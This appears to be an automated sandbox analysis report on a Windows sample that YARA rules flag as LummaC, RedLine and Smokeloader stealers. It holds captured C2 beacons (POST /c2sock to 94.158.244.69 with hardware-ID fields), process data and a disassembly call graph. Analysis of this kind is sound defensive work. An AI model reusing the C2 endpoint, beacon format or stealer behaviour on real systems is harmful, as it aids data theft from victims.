                                                        Nov 13, 2024 10:55:30.302759886 CET2472OUTData Raw: a6 77 fd 8f 2b 61 ef 30 af 97 73 82 b9 3e 20 8e c3 14 a5 69 5d e9 19 df e9 ff e7 ff bb be b2 66 bf 5a f6 d3 15 b5 e1 b7 fc ba b4 83 b7 ae a8 bd bc e7 ca f3 25 a8 1d 8e 7f 7c 09 cf 24 96 f4 ff fd 8e 7f c1 2f fb e9 71 fa 7c dc e3 65 6f 0f 8c 0b e7
                                                        Data Ascii: w+a0s> i]fZ%|$/q|eoJ|k~u?ptE]qy:s_85gq_x_mq'a1m;#33kb{F2,m9)~m|/m}?O_9
                                                        Nov 13, 2024 10:55:30.302772045 CET2472OUTData Raw: 66 3e db af eb ad d0 2f 89 fa 9d 71 70 3f fc db 7d c9 71 da 26 6e f5 9e 63 6d 39 5c 83 ba 41 f8 08 6a 88 50 33 c4 75 d6 60 53 e8 3d 84 93 d1 0a e5 6c 5c ae 31 06 f3 c3 7d a6 7b 86 08 6f c1 f5 a8 03 bb 29 b8 16 f7 c2 71 ce af c5 b6 e9 61 30 44 ec
                                                        Data Ascii: f>/qp?}q&ncm9\AjP3u`S=l\1}{o)qa0D:pc>I/1\7~v/G'PZzg[UkVcwnwkik0h AcO+f~`;[
                                                        Nov 13, 2024 10:55:30.302793980 CET2472OUTData Raw: f1 5c f0 69 6f ff 19 7b 8e 0b ad 50 7e 16 fc 5c 71 d3 0c 75 a9 f7 bd 23 77 fe d6 7f 2f 67 fc d9 37 c7 27 f1 dd 24 b8 5f fb 4c 30 dd 07 e1 76 ef 5e e5 a7 65 eb 02 06 e1 eb 34 9c 26 2d b0 69 33 6c c2 02 e1 73 8d ce 0d a1 ef 25 99 e0 9b 97 f8 69 68
                                                        Data Ascii: \io{P~\qu#w/g7'$_L0v^e4&-i3ls%ih@q},j\V7=+,|3<k$o-n&Si2LI;nWyZ_D\Zf_0|/i|y0sG9 9Oj<Jj,3<3f
                                                        Nov 13, 2024 10:55:30.302813053 CET2472OUTData Raw: bf 81 b0 fe 5f b7 fb 9f 5b ff af bb fd af 59 03 cc e3 7f 3c 66 da 9f bf cf f9 5f 53 06 d8 a5 fe 37 f3 4f ad 33 c0 34 ff 8b 19 a0 f3 bf a6 fc 2f b7 01 96 e4 7f 85 0d b0 43 fe 17 ee 37 fc 4f da 5f 2b fc af 68 0f 70 bb e6 ff 9a 6b 01 d2 fd 6c fe 27
                                                        Data Ascii: _[Y<f_S7O34/C7O_+hpkl'{a;'M~H/D}}\s]Xo~\/X/pxhzVc0>+0ru~22WX=9z~oiE~%t?93\G0TT]3?`:A>rm?
                                                        Nov 13, 2024 10:55:30.302830935 CET1236OUTData Raw: af 6d fe af 39 ff c3 b4 bf 30 a2 e6 2f cd fb 9a 9d ff c1 7e 5f 1a 9f 7c 2e 8f c9 7d a1 f5 05 76 98 67 fe 87 b9 fe 5f 92 ff 49 27 e4 ac 10 d6 ff 49 ff a3 fb d1 f7 38 0f 18 be 87 e7 b2 f6 cf ec f9 8d ac 0d 28 fa 7a e9 7f e6 fa 7f b2 f6 2f 9c fb 6b
                                                        Data Ascii: m90/~_|.}vg_I'I8(z/keF5<WByr\1O:!{9ix~>HXc4{fqN}YyO*;"Y\{4'y7o:]i}9?i


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.84971694.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:55:39.827390909 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:55:39.827801943 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.84971794.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:55:48.616439104 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:55:48.616862059 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.84971894.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:55:57.724904060 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:55:57.725347042 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.84971994.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:56:06.579957008 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:56:06.580327034 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.84972094.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:56:15.360138893 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:56:15.360508919 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.84972194.158.244.69807500C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 13, 2024 10:56:24.128138065 CET188OUTPOST /c2sock HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                        User-Agent: TeslaBrowser/5.5
                                                        Content-Length: 440
                                                        Host: 94.158.244.69
                                                        Nov 13, 2024 10:56:24.128518105 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:04:53:35
                                                        Start date:13/11/2024
                                                        Path:C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\I2BJhmJou4.exe"
                                                        Imagebase:0x400000
                                                        File size:474'624 bytes
                                                        MD5 hash:C847CB3090530EC9AE2E82805A03360D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:04:56:32
                                                        Start date:13/11/2024
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708
                                                        Imagebase:0x6e0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:4%
                                                          Dynamic/Decrypted Code Coverage:10.1%
                                                          Signature Coverage:52.5%
                                                          Total number of Nodes:774
                                                          Total number of Limit Nodes:25
                                                          execution_graph 73663 4102d1 73666 447a80 73663->73666 73669 44e224 73666->73669 73670 4102da 73669->73670 73671 44e22f RtlFreeHeap 73669->73671 73671->73670 73672 44e244 GetLastError 73671->73672 73673 44e251 __dosmaperr 73672->73673 73675 4447a4 14 API calls __dosmaperr 73673->73675 73675->73670 73676 2ed003c 73677 2ed0049 73676->73677 73691 2ed0e0f SetErrorMode SetErrorMode 73677->73691 73682 2ed0265 73683 2ed02ce VirtualProtect 73682->73683 73685 2ed030b 73683->73685 73684 2ed0439 VirtualFree 73689 2ed05f4 LoadLibraryA 73684->73689 73690 2ed04be 73684->73690 73685->73684 73686 2ed04e3 LoadLibraryA 73686->73690 73688 2ed08c7 73689->73688 73690->73686 73690->73689 73692 2ed0223 73691->73692 73693 2ed0d90 73692->73693 73694 2ed0dad 73693->73694 73695 2ed0dbb GetPEB 73694->73695 73696 2ed0238 VirtualAlloc 73694->73696 73695->73696 73696->73682 73697 4069a1 73715 4069ba __CreateFrameInfo 73697->73715 73698 406aed lstrcatW lstrcatW 73698->73715 73699 407722 lstrcatW lstrcatW 73699->73715 73702 40738c 73703 408a5a lstrcatW lstrcatW 73716 40e14e 73703->73716 73706 408a43 73736 404710 46 API calls 73706->73736 73709 4360e1 15 API calls 73709->73715 73713 40620b 166 API calls 73713->73715 73714 405aaa 178 API calls 73714->73715 73715->73698 73715->73699 73715->73702 73715->73703 73715->73706 73715->73709 73715->73713 73715->73714 73730 403ead 46 API calls _strlen 73715->73730 73731 4034bc 46 API calls 73715->73731 73732 403d1e 46 API calls 73715->73732 73733 40476b 99 API calls 73715->73733 73734 404710 46 API calls 73715->73734 73735 4034fd 101 API calls 73715->73735 73729 40e172 __CreateFrameInfo 73716->73729 73717 408a85 73719 40b81c 43 API calls 73719->73729 73720 40f53e lstrcatW lstrcatW lstrcatW 73720->73729 73723 40e7bc lstrcatW 73727 40e14e 155 API calls 73723->73727 73724 40e14e 155 API calls 73724->73729 73725 447a80 14 API calls ___std_exception_destroy 73725->73729 73726 40e54f lstrcatW lstrcatW 73726->73729 73727->73729 73728 40d994 155 API calls 73728->73729 73729->73717 73729->73719 73729->73720 73729->73723 73729->73724 73729->73725 73729->73726 73729->73728 73737 40b129 73729->73737 73749 438e28 73729->73749 73757 419e6b 73729->73757 73730->73715 73731->73715 73732->73715 73733->73715 73734->73715 73735->73715 73736->73703 73738 40b13c __CreateFrameInfo 73737->73738 73739 40b494 73738->73739 73740 40a928 41 API calls 73738->73740 73741 40b759 NtReadFile 73738->73741 73742 40b81c 41 API calls 73738->73742 73743 438e28 LoadLibraryW GetPEB lstrcmpiW 73738->73743 73745 40b129 41 API calls 73738->73745 73748 447e24 15 API calls ___std_exception_copy 73738->73748 73765 40b7bb 73738->73765 73740->73738 73744 438e28 3 API calls 73741->73744 73742->73738 73743->73738 73746 40b7ab NtClose 73744->73746 73745->73738 73746->73729 73748->73738 73755 438e45 73749->73755 73750 43935b LoadLibraryW 73750->73755 73751 43a4fe GetPEB lstrcmpiW 73751->73755 73752 439535 GetPEB lstrcmpiW 73752->73755 73753 438e28 GetPEB lstrcmpiW 73753->73755 73754 43b362 GetPEB lstrcmpiW 73754->73755 73755->73750 73755->73751 73755->73752 73755->73753 73755->73754 73756 439136 73755->73756 73756->73729 73760 419e88 73757->73760 73761 41a1d4 73760->73761 73821 418b8f 73760->73821 73824 41831a 119 API calls _wctomb_s 73760->73824 73825 419496 106 API calls 3 library calls 73760->73825 73826 4137c1 16 API calls 2 library calls 73760->73826 73827 41900a 46 API calls 2 library calls 73760->73827 73761->73729 73761->73761 73771 40a928 73765->73771 73767 40b812 73767->73738 73768 40b7ca 73768->73767 73768->73768 73769 438e28 3 API calls 73768->73769 73770 40b807 NtClose 73769->73770 73770->73767 73772 40a941 __CreateFrameInfo 73771->73772 73773 438e28 3 API calls 73772->73773 73775 40a956 __CreateFrameInfo 73773->73775 73774 40b02e lstrcatW lstrlenW 73774->73775 73775->73774 73776 40ac51 lstrlenW 73775->73776 73777 40acba lstrcatW 73775->73777 73778 438e28 3 API calls 73775->73778 73780 40ae4c 73775->73780 73781 40a928 38 API calls 73775->73781 73782 40af6b NtCreateFile 73775->73782 73784 40b129 38 API calls 73775->73784 73785 40b7bb 38 API calls 73775->73785 73786 40b81c 73775->73786 73776->73775 73777->73775 73778->73775 73780->73768 73780->73780 73781->73775 73783 438e28 3 API calls 73782->73783 73783->73775 73784->73775 73785->73775 73811 40b835 __fread_nolock __CreateFrameInfo 73786->73811 73787 40d120 NtQueryDirectoryFile 73787->73811 73788 40d6a1 lstrcmpW 73788->73811 73789 40d7fe lstrlenW 73789->73811 73790 40d817 lstrlenW 73790->73811 73791 40d3c0 lstrcmpW 73791->73811 73792 40d891 lstrcmpW 73792->73811 73793 40c3a9 lstrcmpW 73793->73811 73794 40d352 73794->73775 73794->73794 73795 40b81c 26 API calls 73795->73811 73796 40c57e lstrlenW 73796->73811 73797 438e28 3 API calls 73804 40d547 NtClose 73797->73804 73798 438e28 LoadLibraryW GetPEB lstrcmpiW 73798->73811 73799 40cc06 lstrcatW lstrcatW 73799->73811 73800 40c8cc lstrcmpW 73800->73811 73801 40c8fe lstrlenW 73801->73811 73802 40cdde lstrcatW 73802->73811 73803 438e28 3 API calls 73808 40cced NtCreateFile 73803->73808 73804->73811 73805 40a928 26 API calls 73805->73811 73807 40b7bb 26 API calls 73807->73811 73808->73811 73809 40c415 lstrcatW lstrcatW 73809->73811 73810 40b129 26 API calls 73810->73811 73811->73787 73811->73788 73811->73789 73811->73790 73811->73791 73811->73792 73811->73793 73811->73794 73811->73795 73811->73796 73811->73797 73811->73798 73811->73799 73811->73800 73811->73801 73811->73802 73811->73803 73811->73805 73811->73807 73811->73809 73811->73810 73812 447e24 73811->73812 73817 44eb6f _unexpected 73812->73817 73813 44ebad 73820 4447a4 14 API calls __dosmaperr 73813->73820 73815 44eb98 RtlAllocateHeap 73816 44ebab 73815->73816 73815->73817 73816->73811 73817->73813 73817->73815 73819 44e560 EnterCriticalSection LeaveCriticalSection _unexpected 73817->73819 73819->73817 73820->73816 73828 418ba2 73821->73828 73823 418b9e 73823->73760 73824->73760 73825->73760 73826->73760 73827->73760 73829 418bb9 _strlen 73828->73829 73840 418c73 73828->73840 73830 447a80 ___std_exception_destroy 14 API calls 73829->73830 73831 418bfe 73829->73831 73829->73840 73830->73831 73832 418c33 73831->73832 73835 418cf3 73831->73835 73831->73840 73839 418c68 73832->73839 73846 415039 46 API calls 73832->73846 73834 447a80 ___std_exception_destroy 14 API calls 73834->73840 73835->73839 73841 44614f GetSystemTimeAsFileTime 73835->73841 73837 418e08 73843 417099 73837->73843 73839->73834 73839->73840 73840->73823 73842 446188 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 73841->73842 73842->73837 73847 44575f 73843->73847 73845 4170be 73845->73839 73846->73839 73848 44576a 73847->73848 73849 44578d 73848->73849 73850 44577a 73848->73850 73852 44579f 73849->73852 73861 4457b2 73849->73861 73893 4447a4 14 API calls __dosmaperr 73850->73893 73895 4447a4 14 API calls __dosmaperr 73852->73895 73853 44577f 73894 44e2f7 29 API calls __fread_nolock 73853->73894 73855 4457a4 73896 44e2f7 29 API calls __fread_nolock 73855->73896 73856 4457d2 73897 4447a4 14 API calls __dosmaperr 73856->73897 73857 4457e3 73885 453aae 73857->73885 73861->73856 73861->73857 73865 4457fa 73866 4459ee 73865->73866 73905 45373d 73865->73905 73924 44e307 11 API calls CallUnexpected 73866->73924 73869 4459f8 73870 44580c 73870->73866 73912 453769 73870->73912 73872 44581e 73872->73866 73873 445827 73872->73873 73874 4458ac 73873->73874 73876 445848 73873->73876 73922 4537d0 29 API calls 3 library calls 73874->73922 73919 4537d0 29 API calls 3 library calls 73876->73919 73877 4458b3 73883 445789 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 73877->73883 73923 453a5a 29 API calls 2 library calls 73877->73923 73879 445860 73879->73883 73920 453a5a 29 API calls 2 library calls 73879->73920 73882 445879 73882->73883 73921 4537d0 29 API calls 3 library calls 73882->73921 73883->73845 73886 453aba ___scrt_is_nonwritable_in_current_image 73885->73886 73887 4457e8 73886->73887 73925 44d13d EnterCriticalSection 73886->73925 73898 453711 73887->73898 73889 453acb 73890 453adf 73889->73890 73926 453ff7 73889->73926 73938 453b02 LeaveCriticalSection CallUnexpected 73890->73938 73893->73853 73894->73883 73895->73855 73896->73883 73897->73883 73899 453732 73898->73899 73900 45371d 73898->73900 73899->73865 74001 4447a4 14 API calls __dosmaperr 73900->74001 73902 453722 74002 44e2f7 29 API calls __fread_nolock 73902->74002 73904 45372d 73904->73865 73906 45375e 73905->73906 73907 453749 73905->73907 73906->73870 74003 4447a4 14 API calls __dosmaperr 73907->74003 73909 45374e 74004 44e2f7 29 API calls __fread_nolock 73909->74004 73911 453759 73911->73870 73913 453775 73912->73913 73914 45378a 73912->73914 74005 4447a4 14 API calls __dosmaperr 73913->74005 73914->73872 73916 45377a 74006 44e2f7 29 API calls __fread_nolock 73916->74006 73918 453785 73918->73872 73919->73879 73920->73882 73921->73883 73922->73877 73923->73883 73924->73869 73925->73889 73939 453b0b 73926->73939 73929 454053 73957 453bc4 73929->73957 73930 45404a 73951 453d65 73930->73951 73933 454050 73934 44e224 ___free_lconv_mon 14 API calls 73933->73934 73935 45405e 73934->73935 73980 43d298 5 API calls ___raise_securityfailure 73935->73980 73937 45406b 73937->73890 73938->73887 73981 45af54 73939->73981 73942 453b31 73942->73929 73942->73930 73945 45af54 42 API calls 73947 453b6a 73945->73947 73946 44e224 ___free_lconv_mon 14 API calls 73946->73942 73948 453b74 73947->73948 73949 453b52 73947->73949 73950 44e224 ___free_lconv_mon 14 API calls 73948->73950 73949->73946 73950->73942 73952 453d75 73951->73952 73953 453769 29 API calls 73952->73953 73954 453d96 73953->73954 73996 44e307 11 API calls CallUnexpected 73954->73996 73956 453ff6 73958 453bd4 73957->73958 73959 453769 29 API calls 73958->73959 73960 453bf1 73959->73960 73961 453d13 73960->73961 73962 453711 29 API calls 73960->73962 74000 44e307 11 API calls CallUnexpected 73961->74000 73964 453c03 73962->73964 73964->73961 73966 45373d 29 API calls 73964->73966 73965 453d1d 73967 453c15 73966->73967 73967->73961 73968 453c1e 73967->73968 73969 44e224 ___free_lconv_mon 14 API calls 73968->73969 73970 453c29 GetTimeZoneInformation 73969->73970 73971 453c45 73970->73971 73972 453cf0 73970->73972 73973 453c79 __fread_nolock 73971->73973 73972->73933 73997 4512d8 41 API calls 2 library calls 73973->73997 73975 453cc8 73998 453b82 43 API calls 3 library calls 73975->73998 73977 453cd9 73999 453b82 43 API calls 3 library calls 73977->73999 73979 453ced 73979->73972 73980->73937 73982 45af5f ___scrt_is_nonwritable_in_current_image 73981->73982 73983 44d13d CallUnexpected EnterCriticalSection 73982->73983 73984 45af76 73983->73984 73985 45b042 42 API calls 73984->73985 73986 45af8c 73985->73986 73987 45afb5 LeaveCriticalSection 73986->73987 73988 453b2a 73987->73988 73988->73942 73989 44eb6f 73988->73989 73990 44ebad 73989->73990 73994 44eb7d _unexpected 73989->73994 73991 4447a4 __dosmaperr 14 API calls 73990->73991 73993 44ebab 73991->73993 73992 44eb98 RtlAllocateHeap 73992->73993 73992->73994 73993->73945 73993->73949 73994->73990 73994->73992 73995 44e560 _unexpected EnterCriticalSection LeaveCriticalSection 73994->73995 73995->73994 73996->73956 73997->73975 73998->73977 73999->73979 74000->73965 74001->73902 74002->73904 74003->73909 74004->73911 74005->73916 74006->73918 74007 43c910 74008 43c91c ___scrt_is_nonwritable_in_current_image 74007->74008 74033 43cbbb 74008->74033 74010 43c923 74011 43ca76 74010->74011 74022 43c94d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 74010->74022 74056 43ce95 4 API calls 2 library calls 74011->74056 74013 43ca7d 74049 443854 74013->74049 74017 43ca8b 74018 43c96c 74019 43c9ed 74041 43ce0e GetStartupInfoW __fread_nolock 74019->74041 74021 43c9f3 74042 42f1a8 74021->74042 74022->74018 74022->74019 74052 44389e 41 API calls 3 library calls 74022->74052 74027 43ca0f 74027->74013 74028 43ca13 74027->74028 74029 43ca1c 74028->74029 74054 443880 23 API calls CallUnexpected 74028->74054 74055 43cbf4 77 API calls ___scrt_uninitialize_crt 74029->74055 74032 43ca24 74032->74018 74034 43cbc4 74033->74034 74058 43d0b8 IsProcessorFeaturePresent 74034->74058 74036 43cbd0 74059 43d5c2 10 API calls 2 library calls 74036->74059 74038 43cbd5 74039 43cbd9 74038->74039 74060 43d5e1 7 API calls 2 library calls 74038->74060 74039->74010 74041->74021 74043 42f1ad 74042->74043 74061 4245ec 74043->74061 74070 4244e4 GetPEB 74043->74070 74074 42d658 74043->74074 74099 422177 74043->74099 74044 42f1bd 74053 43ce3f GetModuleHandleW 74044->74053 74470 443a0a 74049->74470 74052->74019 74053->74027 74054->74029 74055->74032 74056->74013 74057 44386a 23 API calls CallUnexpected 74057->74017 74058->74036 74059->74038 74060->74039 74062 424605 74061->74062 74063 4247ff NtQuerySystemInformation 74062->74063 74064 4224a3 GetPEB NtQueryInformationProcess GetPEB 74062->74064 74065 4247b0 GetPEB 74062->74065 74068 424980 74062->74068 74069 422177 56 API calls 74062->74069 74107 4279e0 74062->74107 74111 4262a1 74062->74111 74063->74062 74064->74062 74065->74062 74068->74044 74069->74062 74071 424502 74070->74071 74072 4279e0 GetPEB 74071->74072 74073 4245d2 NtSetInformationThread 74071->74073 74072->74071 74073->74044 74096 42d66d 74074->74096 74075 422177 58 API calls 74075->74096 74076 42f19d 74076->74044 74080 4269e4 GetPEB GetPEB 74080->74096 74081 4262a1 58 API calls 74081->74096 74082 42f1c2 GetPEB NtClose GetPEB 74082->74096 74084 4244e4 3 API calls 74084->74096 74085 42d658 281 API calls 74085->74096 74087 42f265 GetPEB 74087->74096 74089 4245ec 58 API calls 74089->74096 74091 40e14e 161 API calls 74091->74096 74094 41a28f 182 API calls 74094->74096 74095 419b9d 72 API calls 74095->74096 74096->74075 74096->74076 74096->74080 74096->74081 74096->74082 74096->74084 74096->74085 74096->74087 74096->74089 74096->74091 74096->74094 74096->74095 74098 4360e1 15 API calls 74096->74098 74197 402fcc LoadLibraryA LoadLibraryA 74096->74197 74207 401ff9 74096->74207 74218 402476 74096->74218 74231 430228 74096->74231 74244 436adc 74096->74244 74261 434080 74096->74261 74277 433c10 74096->74277 74287 421eeb 74096->74287 74293 4224a3 74096->74293 74299 42cfba 74096->74299 74098->74096 74101 422191 74099->74101 74100 422398 NtQueryInformationProcess 74100->74101 74101->74100 74102 42245b GetPEB 74101->74102 74103 4279e0 GetPEB 74101->74103 74106 422491 74101->74106 74468 41f916 GetPEB VirtualQuery 74101->74468 74469 41ebeb 58 API calls 74101->74469 74102->74101 74103->74101 74106->74044 74108 4279fe 74107->74108 74110 428317 74108->74110 74128 428334 GetPEB 74108->74128 74110->74062 74125 4262bc __fread_nolock 74111->74125 74112 426847 RtlAdjustPrivilege 74116 4279e0 GetPEB 74112->74116 74113 426972 74124 422177 55 API calls 74113->74124 74113->74125 74169 424c44 GetModuleFileNameW CreateFileW CloseHandle 74113->74169 74114 4279e0 GetPEB 74114->74125 74115 426600 GetPEB 74115->74125 74116->74125 74118 4269dc 74118->74062 74120 4263c1 LoadLibraryA 74120->74125 74122 422817 17 API calls 74122->74125 74124->74113 74125->74112 74125->74113 74125->74114 74125->74115 74125->74118 74125->74120 74125->74122 74126 4244e4 3 API calls 74125->74126 74129 41f9a4 74125->74129 74166 41eb3f RaiseException 74125->74166 74167 424995 20 API calls 2 library calls 74125->74167 74168 426a42 GetPEB GetPEB 74125->74168 74126->74125 74128->74108 74163 41f9bc 74129->74163 74130 421bb3 NtQuerySystemInformation 74130->74163 74131 421bff NtQuerySystemInformation 74131->74163 74132 42162a GetProcessId 74132->74163 74134 422817 17 API calls 74134->74163 74135 4262a1 51 API calls 74135->74163 74136 4245ec 51 API calls 74136->74163 74137 424b24 GetPEB HeapDestroy 74137->74163 74139 420e2d NtClose 74139->74163 74140 4228cf 51 API calls 74140->74163 74141 420a7a GetPEB 74141->74163 74142 4224a3 GetPEB NtQueryInformationProcess GetPEB 74142->74163 74143 421ee3 74143->74125 74145 4202ad GetCurrentProcessId 74145->74163 74146 447a80 ___std_exception_destroy 14 API calls 74146->74163 74147 420593 NtDuplicateObject 74147->74163 74149 41f536 51 API calls 74149->74163 74150 447e24 ___std_exception_copy 15 API calls 74150->74163 74153 421eeb NtQueryInformationProcess GetPEB GetPEB 74153->74163 74154 41f916 GetPEB VirtualQuery 74154->74163 74155 424995 20 API calls 74155->74163 74156 426a42 GetPEB GetPEB 74156->74163 74157 420bb6 74157->74163 74185 424c44 GetModuleFileNameW CreateFileW CloseHandle 